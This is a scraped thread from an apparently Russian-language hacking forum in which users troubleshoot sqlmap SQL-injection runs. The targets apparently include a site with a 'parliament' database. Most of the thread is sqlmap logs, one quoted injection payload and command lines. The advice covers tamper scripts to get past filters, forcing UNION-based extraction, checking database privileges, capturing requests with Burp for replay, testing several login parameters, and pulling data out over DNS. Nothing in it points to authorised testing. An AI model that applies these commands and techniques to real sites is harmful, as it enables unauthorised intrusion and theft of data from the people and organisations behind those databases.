Статья Сканируем и раскручиваем SQL Injection с умом

[Dolmabash]

--hex --no-cast -threads=10 не помогает (((
названии таблицы не увидеть никак.

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)

Type: boolean-based blind

Type: UNION query




[02:49:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:49:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL < 5.0.12
[02:49:55] [INFO] fetching tables for database: 'database'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [INFO] fetching number of tables for database 'parliament'
[02:50:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:50:00] [INFO] retrieved:
[02:50:00] [WARNING] time-based comparison requires larger statistical model, please wait.................... (done)
[02:50:06] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[02:50:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[02:50:07] [WARNING] unable to retrieve the number of tables for database 'database'
[02:50:07] [INFO] fetching number of tables for database 'database'
[02:50:07] [INFO] retrieved:
[02:50:07] [INFO] retrieved:
[02:50:08] [ERROR] unable to retrieve the table names for any database

 

[etc/passwd]

--hex --no-cast -threads=10 не помогает (((
названии таблицы не увидеть никак.

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)

Type: boolean-based blind

Type: UNION query




[02:49:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:49:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL < 5.0.12
[02:49:55] [INFO] fetching tables for database: 'database'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [INFO] fetching number of tables for database 'parliament'
[02:50:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:50:00] [INFO] retrieved:
[02:50:00] [WARNING] time-based comparison requires larger statistical model, please wait.................... (done)
[02:50:06] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[02:50:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[02:50:07] [WARNING] unable to retrieve the number of tables for database 'database'
[02:50:07] [INFO] fetching number of tables for database 'database'
[02:50:07] [INFO] retrieved:
[02:50:07] [INFO] retrieved:
[02:50:08] [ERROR] unable to retrieve the table names for any database

я так понимаю ты получил только database() , значит 99%, что фильтр либо на information_schema, либо на ннижнее подчеркивание, либо на точку, попробуй тампер на двойное url кодирование.

 

[rwanda]

Parameter: JSON #4* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: {"req_type":"search","req_code":"the%' AND 339<(2) OR NOT 9340=9340-- FpZf4) AND '000amA7'!='000amA7%"}
---
[14:52:54] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[14:52:54] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[14:52:54] [INFO] fetching database (schema) names
[14:52:54] [INFO] fetching number of databases
[14:52:54] [INFO] retrieved:
[14:52:59] [ERROR] unable to retrieve the number of databases
[14:52:59] [INFO] falling back to current database
[14:52:59] [INFO] fetching current database
[14:52:59] [INFO] retrieving the length of query output
[14:52:59] [INFO] retrieved:
[14:53:03] [INFO] retrieved:
[14:53:06] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:53:06] [CRITICAL] unable to retrieve the database names

--no-cast --hex не помогает

--hex --no-cast -threads=10 не помогает (((
названии таблицы не увидеть никак.

Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)

Type: boolean-based blind

Type: UNION query




[02:49:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:49:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL < 5.0.12
[02:49:55] [INFO] fetching tables for database: 'database'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:49:59] [WARNING] the SQL query provided does not return any output
[02:49:59] [INFO] fetching number of tables for database 'parliament'
[02:50:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:50:00] [INFO] retrieved:
[02:50:00] [WARNING] time-based comparison requires larger statistical model, please wait.................... (done)
[02:50:06] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[02:50:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[02:50:07] [WARNING] unable to retrieve the number of tables for database 'database'
[02:50:07] [INFO] fetching number of tables for database 'database'
[02:50:07] [INFO] retrieved:
[02:50:07] [INFO] retrieved:
[02:50:08] [ERROR] unable to retrieve the table names for any database

First try checking user privileges and the current database.
Then run something like this:
sqlmap --url "yourvuln.website/lalala.asp?parameter=2" --dbms=postgresql --technique=U --current-user --current-db --privileges -dbs # the --technique=U will force sqlmap to use union based instead of blind SQL.
See your user privileges and what statements he can use!
After this try enumerating your respective use database, from there you can try seeing sqlmap behaviour, if works probably will show you the tables names when you do the whole '-D databasename --tables' thing, if fails something like 'not able to fetch current tables from databaseXYZ' then you can try using --technique=B instead, you could also try setting up a NS server to fetch the results faster.

Data Exfiltration with DNS in SQLi attacks – Pentest Blog

pentest.blog

 

[Dolmabash]

First try checking user privileges and the current database.
Then run something like this:
sqlmap --url "yourvuln.website/lalala.asp?parameter=2" --dbms=postgresql --technique=U --current-user --current-db --privileges -dbs # the --technique=U will force sqlmap to use union based instead of blind SQL.
See your user privileges and what statements he can use!
After this try enumerating your respective use database, from there you can try seeing sqlmap behaviour, if works probably will show you the tables names when you do the whole '-D databasename --tables' thing, if fails something like 'not able to fetch current tables from databaseXYZ' then you can try using --technique=B instead, you could also try setting up a NS server to fetch the results faster.

Data Exfiltration with DNS in SQLi attacks – Pentest Blog

pentest.blog

[04:27:53] [WARNING] the SQL query provided does not return any output
[04:27:53] [ERROR] unable to retrieve the table names for any database



[04:28:28] [CRITICAL] unable to retrieve the privileges for the database users
[04:28:28] [INFO] fetching tables for database: 'DATABASE'
[04:28:29] [WARNING] the SQL query provided does not return any output
[04:28:29] [WARNING] the SQL query provided does not return any output
[04:28:29] [ERROR] unable to retrieve the table names for any database

 

[Dolmabash]

я так понимаю ты получил только database() , значит 99%, что фильтр либо на information_schema, либо на ннижнее подчеркивание, либо на точку, попробуй тампер на двойное url кодирование.

только 1 дб... нету information_schema

 

[Dolmabash]

я так понимаю ты получил только database() , значит 99%, что фильтр либо на information_schema, либо на ннижнее подчеркивание, либо на точку, попробуй тампер на двойное url кодирование.

пробывал тампер.... брут находит только 1 таблицу.


web application technology: Apache
back-end DBMS: MySQL < 5.0.12
[04:35:53] [INFO] fetching columns for table 'tblNews' in database 'DATABASE'
[04:35:54] [WARNING] the SQL query provided does not return any output
[04:35:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

 

[etc/passwd]

только 1 дб... нету information_schema

В 5 версии есть information_schema. У тебя фильтр, как я писал выше, вбей запрос в браузер и посмотри на что фильтр.

 

[ivan2021]

interesting, thanks for share!

 

[rwanda]

[04:27:53] [WARNING] the SQL query provided does not return any output
[04:27:53] [ERROR] unable to retrieve the table names for any database



[04:28:28] [CRITICAL] unable to retrieve the privileges for the database users
[04:28:28] [INFO] fetching tables for database: 'DATABASE'
[04:28:29] [WARNING] the SQL query provided does not return any output
[04:28:29] [WARNING] the SQL query provided does not return any output
[04:28:29] [ERROR] unable to retrieve the table names for any database

Hmm maybe something is fucked at the request you're forming for SQLi.
I would suggest try finding other injection points on the same target and test better, first step is actually discovering if database is MySQL or Postgresql, than proceed with exploitation.
What is the full sqlmap cmd you're using it?

 

[kimasto]

Как быть если несколько точек входа есть. К примеру
POST
site.com/login
email=dfhj@gmail.com&user=sdkjfh

sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email -p user (так чтоли?)или sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email, user или 2 окна мапа на 2 параметра? или можно так? sqlmap.py -u "site.com/login" --data="email=*&user=*"
И почему лучше не использовать *

 

[Fine]

2

Как быть если несколько точек входа есть. К примеру
POST
site.com/login
email=dfhj@gmail.com&user=sdkjfh

sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email -p user (так чтоли?)или sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email, user или 2 окна мапа на 2 параметра? или можно так? sqlmap.py -u "site.com/login" --data="email=*&user=*"
И почему лучше не использовать *

2 и 3 вариант точно ворк, насчет второго вопроса - не знаю, но если будешь юзать звездочку - ставь еще --batch, или --answers они за тебя ответят автоматом

 

[kimasto]

2

2 и 3 вариант точно ворк, насчет второго вопроса - не знаю, но если будешь юзать звездочку - ставь еще --batch, или --answers они за тебя ответят автоматом

--answer стоит
--batch - не доверяю ему))
если варик -p email, user точно работает, то это гуд

 

[CheckerChin]

Как быть если несколько точек входа есть. К примеру
POST
site.com/login
email=dfhj@gmail.com&user=sdkjfh

sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email -p user (так чтоли?)или sqlmap.py -u "site.com/login" --data="email=dfhj@gmail.com&user=sdkjfh" -p email, user или 2 окна мапа на 2 параметра? или можно так? sqlmap.py -u "site.com/login" --data="email=*&user=*"
И почему лучше не использовать *

Во-первых, стоит запускать с запросом, а не делать вот эту всю ебаторию.
Запрос снифаешь бурпом, сохраняешь в тхт и sqlmap -r req.txt. К нему дописываешь нужные параметры по типу лвла и тд.
sqlmap по умолчанию тестит все параметры, тебе же лог пишут, что происходит сейчас...

 

[kimasto]

Во-первых, стоит запускать с запросом, а не делать вот эту всю ебаторию.
Запрос снифаешь бурпом, сохраняешь в тхт и sqlmap -r req.txt. К нему дописываешь нужные параметры по типу лвла и тд.
sqlmap по умолчанию тестит все параметры, тебе же лог пишут, что происходит сейчас...

Почему все параметры тестит? Разве не так что если через * или -p укажешь параметр, то он только этот параметр будет тестить?
если к примеру указать --data="email=dfhj@gmail.com&user=sdkjfh" -p user , он же проверит только параметр user

 

[CheckerChin]

Почему все параметры тестит? Разве не так что если через * или -p укажешь параметр, то он только этот параметр будет тестить?
если к примеру указать --data="email=dfhj@gmail.com&user=sdkjfh" -p user , он же проверит только параметр user

через -p да, оно будет тестить этот параметр.
Но

sqlmap по умолчанию тестит все параметры

(это подразумевает без -p)

 

[kimasto]

через -p да, оно будет тестить этот параметр.
Но

(это подразумевает без -p)

да это понятно.